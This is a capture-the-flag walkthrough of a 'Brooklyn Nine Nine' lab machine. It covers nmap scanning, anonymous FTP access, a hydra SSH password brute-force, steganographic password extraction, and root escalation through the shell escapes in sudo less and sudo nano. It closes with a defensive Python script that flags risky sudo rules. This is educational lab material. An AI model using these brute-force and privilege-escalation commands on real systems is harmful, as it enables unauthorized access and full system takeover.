Brooklyn Nine Nine

Reconnaissance
Initial nmap scan to find open ports, using the "treat all hosts as alive" flag (-Pn)
nmap -Pn 10.10.146.230

Detailed Nmap Scan:
Command Breakdown:
(-sV): Service version
(-sC): Default nmap scripts
(-p): Specifying ports 21,22,80
(-oN nmap): Saving the output into a file called nmap
nmap -sV -sC -p 21,22,80 -oN nmap 10.10.146.230

Enumeration
Port 21: FTP
Looks like we can log in through FTP as anonymous, so let's do that. (We use anonymous for both the username and the password, or you can just hit enter for the password)
ftp 10.10.146.230

Let's list the files in this directory

Looks like there is a file which is a note to a person called Jake, so let's transfer this file to our machine and read what it has to say.
get note_to_jake.txt

Let's now read the file

Looks like Jake did not change his password, as mentioned by a person called Amy. We also have a username Holt, so we now have three usernames.
Port 80: HTTP
Let's visit the website

It's a Brooklyn Nine Nine poster, so let's look at the source code.

We have something interesting: they mention steganography, which is the practice of concealing a message within another message. So let's download the image onto our machine; the name of the image is in the source code.
wget http://10.10.146.230/brooklyn99.jpg

Exploitation
FTP
We can try to use hydra to find the password for Jake over SSH.
hydra -l jake -P /usr/share/wordlists/rockyou.txt ssh://10.10.146.230

We found the password, so let's log in through SSH.

And we are logged in. We can find the user flag here.

HTTP
We can use a tool called stegcracker to find hidden messages within files. If you do not have it, you can install it with this command
apt-get install stegcracker

Now you can use stegcracker
stegcracker brooklyn99.jpg

We have the password, which should be the passphrase for the hidden file. Let's see what the file is hiding
steghide --extract -sf brooklyn99.jpg

Now we have the password for Holt, so let's log in through SSH.

Privilege Escalation
Jake
Let's run sudo -l to see what Jake can run as root.
sudo -l

Looks like we can run the less command as root, with which we can view the contents of files, so let's run it to check what /root/root.txt contains.
sudo /usr/bin/less /root/root.txt

We can also try to become root using the commands found on GTFOBins

Let's use these commands to become root.
sudo less /etc/profile
!/bin/sh

Holt
Let's run sudo -l to see what Holt can run as root.
sudo -l

We can run nano as root, so let's go to GTFOBins to find the commands to escalate privileges to root.

Let's run these commands
sudo nano
^R^X
reset; sh 1>&0 2>&0

We are now root. You can find the root flag in /root/
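As an added, defender-side example (not part of the original walkthrough): a small Python audit that parses the output of sudo -l and flags rules like the ones Jake and Holt have, i.e. commands that are ALL or pagers/editors with a known shell escape. The sample output, the HOSTNAME placeholder and the function names are constructed for this example.

```python
import re

# Binaries that let the user drop to a shell from inside them when run via sudo.
# less and nano are the two used in this room; the others are common editors and
# pagers with the same property (all listed on GTFOBins).
SHELL_ESCAPE_BINS = {"less", "more", "nano", "vim", "vi", "man"}

# Matches a sudoers rule line such as "    (ALL) NOPASSWD: /usr/bin/less"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(output):
    """Return a list of (runas, nopasswd, command) tuples from `sudo -l` output."""
    rules = []
    in_rules = False
    for line in output.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True  # rule lines follow this header
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            rules.append((m.group("runas").strip(), nopasswd, cmd.strip()))
    return rules


def risky_rules(output):
    """Flag rules whose command is ALL or a binary with a known shell escape."""
    findings = []
    for runas, nopasswd, cmd in parse_sudo_l(output):
        name = cmd.split()[0].rsplit("/", 1)[-1]  # /usr/bin/less -> less
        if cmd == "ALL" or name in SHELL_ESCAPE_BINS:
            findings.append({"command": cmd, "runas": runas, "nopasswd": nopasswd})
    return findings


# Constructed sample of what `sudo -l` might print for Jake in this room
SAMPLE_JAKE = """\
Matching Defaults entries for jake on HOSTNAME:
    env_reset, mail_badpass

User jake may run the following commands on HOSTNAME:
    (ALL) NOPASSWD: /usr/bin/less
"""

if __name__ == "__main__":
    for f in risky_rules(SAMPLE_JAKE):
        print(f"{f['command']} (as {f['runas']}, NOPASSWD={f['nopasswd']}): shell escape possible")
```

Running it on a real host's sudo -l output gives the list of sudo rules worth removing or replacing with a tightly scoped wrapper script.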